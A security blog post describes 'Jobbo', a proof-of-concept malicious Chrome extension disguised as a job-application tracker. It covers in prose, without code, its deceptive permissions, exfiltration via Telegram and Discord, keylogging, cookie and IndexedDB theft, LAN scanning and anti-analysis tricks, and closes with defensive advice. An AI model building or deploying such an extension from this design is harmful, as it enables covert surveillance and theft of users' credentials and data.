Home
Thoughts

The Wolf in Sheep's Clothing – A Red Team Browser Extension
Security

The Wolf in Sheep's Clothing – A Red Team Browser Extension

December 27, 20255 min read

Introduction

In the world of Red Teaming and offensive security, gaining initial access is often the hardest hurdle. Phishing emails are caught by filters, malicious binaries are sandboxed by EDRs, and physical access is risky. But there's one vector that remains dangerously effective and often overlooked: The Browser Extension.

Today, I'm releasing the technical details of Jobbo, a Proof-of-Concept (PoC) malicious browser extension I developed to demonstrate the terrifying capabilities of modern browser-based espionage.

On the surface, Jobbo is a helpful, friendly Chrome extension designed to help job seekers track their applications. It auto-fills forms on LinkedIn and Indeed, saves job descriptions, and organizes your job hunt. Ideally, it’s the tool everyone wants.

Under the hood? It’s a full-featured surveillance suite capable of internal network mapping, credential harvesting, and real-time data exfiltration—all while bypassing traditional network defenses.

The Architecture of Deception

Jobbo utilizes the modern Manifest V3 architecture, often touted by Google as "more secure," effectively turning its limitations into stealth features.

1. The Trojan Horse: manifest.json

The first step in any extension malware is permission creep. Jobbo justifies its existence by asking for:

  • scripting: To "autofill" forms (actually used to inject payloads).
  • cookies: To "save session state" (actually used to steal sessions).
  • webNavigation & tabs: To "detect job pages" (actually used to track user activity).
  • storage: To "save your jobs locally" (actually used to buffer stolen data).

By wrapping these permissions in a legitimate utility, users—and even some automated scanners—grant access without a second thought.

2. The Puppet Master: background.js

This service worker is the brain of the operation. It manages the C2 (Command and Control) communications and orchestrates the data theft.

Key Capabilities:

  • Stealth Exfiltration: Instead of suspicious HTTP requests to unknown IPs, Jobbo exfiltrates data via Telegram Bots and Discord Webhooks. To a network monitor, this traffic looks completely legitimate (encrypted SSL traffic to reputable domains).
  • Encrypted Queue: Data isn't sent immediately. It's queued, encrypted in local storage, and trickled out slowly to avoid traffic spikes that might trigger IDS/IPS systems.
  • Heartbeat & Killswitch: The extension checks a remote gist or C2 server for a "kill switch" or configuration updates, allowing me to pivot targets or go silent instantly.

3. The Eyes and Ears: script2.js (The Content Script)

This is where the magic happens. Injected into every page, this script is a heavy-duty surveillance tool.

  • WebSocket Interceptor: It hooks into window.WebSocket, intercepting real-time traffic. This is devastating for modern applications like Slack, Discord, or trading platforms, allowing Jobbo to read chat messages and financial data in real-time.
  • IndexedDB Pillager: It scans for and extracts data from local IndexedDB databases. This allows offline access to emails (Gmail offline mode), documents (Notion), and chat logs (WhatsApp Web).
  • DOM Scraper & Keylogger: It passively records keystrokes in sensitive fields and scrapes the DOM for patterns matching credit cards, API keys (sk_live_...), and private keys.
  • Clipboard Snatcher: Monitors the clipboard for copied passwords or 2FA codes.

4. Internal Network Scanning

Perhaps the most dangerous feature is the LAN Scan. Using fetch() timing attacks and WebRTC local IP discovery (if not patched), Jobbo maps the user's internal network (192.168.x.x). It looks for common internal dashboards like Jenkins, Jira, or git servers, potentially turning an external compromise into an internal pivot point.

5. Anti-Analysis

Jobbo knows when it's being watched. It employs several anti-analysis techniques:

  • DevTools Detection: It monitors window size changes and console timing differences to detect if Developer Tools are open. If detected, it disables its malicious routines and behaves like a normal extension.
  • Obfuscation: The source code is heavily obfuscated with string arrays, hex encoding, and control flow flattening to frustrate reverse engineering.

Conclusion

Jobbo demonstrates that the browser is the new operating system, and extensions are its kernel modules. As defenders, we must look beyond the endpoint and secure the browser environment. Corporate policies should strictly limit extension installation, and EDR solutions need to evolve to inspect extension behavior more deeply.

Disclaimer: Jobbo is a research tool created for educational and defensive testing purposes only. Misuse of this code is illegal.

Credits & Acknowledgements

This research and proof-of-concept were inspired in part by the work and writings of Faris Faisal (0xFF), whose explorations into browser-based attack surfaces and offensive security research helped shape the conceptual and technical direction of this project.

You can find his work and insights here:
🔗 https://medium.com/@frsfaisall

Please do check him out, He's a really great guy!

← Back to all posts